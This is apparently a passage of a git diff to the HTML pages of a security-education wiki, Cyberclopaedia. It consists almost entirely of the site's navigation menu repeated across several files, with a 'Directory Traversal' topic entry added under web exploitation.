      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -191,22 +191,6 @@

Pipes

- - diff --git a/docs/System Internals/Linux/File System.html b/docs/System Internals/Linux/File System.html index cd14fb3c..3263205d 100644 --- a/docs/System Internals/Linux/File System.html +++ b/docs/System Internals/Linux/File System.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -244,22 +244,6 @@

Sticky Bit

- - diff --git a/docs/System Internals/Linux/Processes.html b/docs/System Internals/Linux/Processes.html index db49e676..4a582df8 100644 --- a/docs/System Internals/Linux/Processes.html +++ b/docs/System Internals/Linux/Processes.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
